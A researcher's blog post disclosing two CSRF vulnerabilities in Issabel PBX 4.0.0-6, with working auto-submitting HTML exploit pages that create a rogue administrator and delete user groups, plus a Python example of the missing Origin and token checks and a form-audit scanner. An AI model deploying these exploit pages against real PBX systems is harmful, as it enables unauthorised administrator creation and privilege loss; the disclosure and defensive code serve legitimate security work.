PBX systems are the unsung heroes of telecommunication infrastructure, quietly running in the background of countless organizations worldwide. They are not as flashy as the latest smartphone or as trendy as a social media platform, but they play a crucial role in keeping communication flowing within businesses.

Next time you pick up a sleek VoIP phone in an office, take a moment to remember the PBX (Private Branch Exchange) system behind it, silently carrying the conversations that drive businesses forward.

An Issabel PBX system

Beneath their unassuming exterior lies a vulnerability landscape worth exploring. Let's uncover some of the potential pitfalls hiding within these essential communication tools.

During a VAPT engagement, I stumbled upon the Issabel PBX software, which was used to manage all the telephony systems within that organization. I identified several vulnerabilities in that software, and when I looked into Shodan, I was surprised to find more than 6000 results of publicly exposed Issabel PBX systems.

More than six thousand Issabel PBX instances exposed on Shodan

To keep this blog short and readable without overwhelming you, I will share some of the more interesting CVEs I discovered, with steps of reproduction.

CVE-2023-34839: forging a new administrator

A Cross-Site Request Forgery (CSRF) flaw in Issabel PBX version 4.0.0-6 lets a remote attacker create a brand new administrator. The user-creation handler accepts a POST authenticated by nothing more than the administrator's session cookie, with no anti-CSRF token and no origin check, so the forged request fires silently the moment a logged-in administrator opens a crafted page.

Steps of reproduction

Save the exploit below as an HTML file, change example.com to your target, and get a logged-in administrator to open it in the same browser session. The attack relies on the browser attaching the administrator's session cookie to a cross-site form POST; if the session cookie carried an explicit SameSite=Lax or Strict attribute the browser would withhold it from that POST and the request would land unauthenticated, so check the cookie attributes if the proof of concept does not fire.

<html>
<!-- CSRF exploit to add admin user -->
  <body>
    <form action="https://example.com/index.php?menu=userlist&action=new" method="POST">
      <input type="hidden" name="save" value="Save" />
      <input type="hidden" name="name" value="CSRF" />
      <input type="hidden" name="description" value="CSRF" />
      <input type="hidden" name="password1" value="Test@12345" />
      <input type="hidden" name="password2" value="Test@12345" />
      <input type="hidden" name="group" value="1" />
      <input type="hidden" name="extension" value="" />
      <input type="hidden" name="id_user" value="" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      // hide the exploit page path from the address bar, then auto-submit the form
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

As soon as the page loads the forged request is submitted and a new admin account appears, in my proof of concept with the password Test@12345, ready to use.

A new administrator account created through the CSRF exploit

CVE-2023-34837: deleting user groups from afar

The same class of weakness lets an attacker delete user groups. When a logged-in administrator opens the crafted page, the group whose id_group value is given in the request is removed, along with every role and privilege attached to it.

Steps of reproduction

Save the exploit below as an HTML file, change example.com to your target and id_group to the numeric id of the group you want removed (7 in the proof of concept), and get a logged-in administrator to open it.

<body>
  <!-- CSRF exploit to delete user group id 7: hide the page path, then auto-submit -->
  <script>history.pushState('', '', '/')</script>
  <form action="https://example.com/index.php?menu=grouplist" method="POST">
    <input type="hidden" name="delete" value="Delete" />
    <input type="hidden" name="id_group" value="7" />
    <input type="submit" value="Submit request" />
  </form>
  <script>document.forms[0].submit();</script>
</body>

When the administrator opens the file, the group with the id given in the exploit is deleted automatically, with no confirmation step, and everyone in that group quietly loses the roles and privileges it granted.

Before the exploit runs

The user group present before the CSRF exploit runs

After the exploit runs

The user group removed after the CSRF exploit runs
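Both CVEs above come down to the same missing checks in the userlist and grouplist POST handlers: nothing ties the request to the page the administrator actually loaded. The Python below is an added example written for this post, not Issabel code. It models the two server-side checks a fixed handler would need, an Origin/Referer check and a per-session synchronizer token, and runs them against a constructed copy of the request the exploit page produces; it also includes a small scanner that flags POST forms lacking a token field, which is the quick audit to run on any PBX admin page before writing a CSRF proof of concept. The csrf_token field name, the list of recognised token names, the session id, the SITE_ORIGIN value and the server secret are all assumptions.

```python
import hashlib
import hmac
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Added example (not Issabel code): the checks the userlist/grouplist POST handlers
# lack. SITE_ORIGIN, SERVER_SECRET, the csrf_token field name and the session ids
# below are assumptions made for the demonstration.
SITE_ORIGIN = "https://example.com"
SERVER_SECRET = b"per-deployment random secret (assumption)"


def issue_token(session_id: str) -> str:
    """Synchronizer token bound to the session: the server embeds it as a hidden
    field when it renders the real form, and a cross-site page cannot read it."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def origin_allowed(headers: dict) -> bool:
    """Browsers send Origin on cross-site form POSTs ('null' for opaque origins),
    so anything but our own origin is rejected. Fall back to Referer only when
    Origin is absent; with neither header present the request is refused."""
    origin = headers.get("Origin")
    if origin is not None:
        return origin == SITE_ORIGIN
    referer = headers.get("Referer")
    if referer is None:
        return False
    p = urlsplit(referer)
    return f"{p.scheme}://{p.netloc}" == SITE_ORIGIN


def state_change_allowed(headers: dict, form: dict, session_id: str) -> bool:
    """Gate for any state-changing POST: origin and token must both check out.
    compare_digest keeps the token comparison constant-time."""
    if not origin_allowed(headers):
        return False
    return hmac.compare_digest(form.get("csrf_token", ""), issue_token(session_id))


class _FormScanner(HTMLParser):
    """Collects each <form> with its method, action and lower-cased input names."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._cur = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._cur = {"action": a.get("action", ""),
                         "method": (a.get("method") or "get").lower(),
                         "fields": []}
            self.forms.append(self._cur)
        elif tag == "input" and self._cur is not None:
            self._cur["fields"].append((a.get("name") or "").lower())

    def handle_endtag(self, tag):
        if tag == "form":
            self._cur = None


TOKEN_FIELD_NAMES = ("csrf_token", "token", "_token", "nonce")  # assumption


def forms_without_token(html: str) -> list:
    """Audit helper: actions of POST forms that carry no recognisable anti-CSRF field."""
    scanner = _FormScanner()
    scanner.feed(html)
    return [f["action"] for f in scanner.forms
            if f["method"] == "post" and not any(n in TOKEN_FIELD_NAMES for n in f["fields"])]


# Constructed sample data: the exploit form from the post and the request it produces.
EXPLOIT_HTML = """<form action="https://example.com/index.php?menu=userlist&amp;action=new" method="POST">
  <input type="hidden" name="save" value="Save" />
  <input type="hidden" name="name" value="CSRF" />
  <input type="hidden" name="password1" value="Test@12345" />
  <input type="hidden" name="password2" value="Test@12345" />
  <input type="hidden" name="group" value="1" />
</form>"""
SESSION_ID = "abc123"  # assumption: the victim administrator's PHP session
EXPLOIT_HEADERS = {"Origin": "https://attacker.example", "Cookie": f"PHPSESSID={SESSION_ID}"}
EXPLOIT_FORM = {"save": "Save", "name": "CSRF", "password1": "Test@12345",
                "password2": "Test@12345", "group": "1"}
# A legitimate submission from the real admin page carries the token the server issued.
LEGIT_HEADERS = {"Origin": SITE_ORIGIN, "Cookie": f"PHPSESSID={SESSION_ID}"}
LEGIT_FORM = dict(EXPLOIT_FORM, name="ops-admin", csrf_token=issue_token(SESSION_ID))

if __name__ == "__main__":
    print("forms lacking a token:", forms_without_token(EXPLOIT_HTML))
    print("forged request accepted:", state_change_allowed(EXPLOIT_HEADERS, EXPLOIT_FORM, SESSION_ID))
    print("legitimate request accepted:", state_change_allowed(LEGIT_HEADERS, LEGIT_FORM, SESSION_ID))
```

The forged request fails on both counts: its Origin is the attacker's site, and it cannot carry a token it never saw. The origin check alone stops the two exploits on this page, but it is kept alongside the token because Referer can be suppressed by referrer policy and older clients omit Origin on some requests; a handler that only trusts the session cookie, as the Issabel handlers do, passes every request the browser is willing to send.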

There were multiple other CSRF and Cross Site Scripting (XSS) issues in different features of the application, which can easily lead to account takeover, but I won't bother you with such a long blog. Please feel free to check out the other vulnerabilities related to this product that I discovered through the link given below.

Stay curious.
Sahil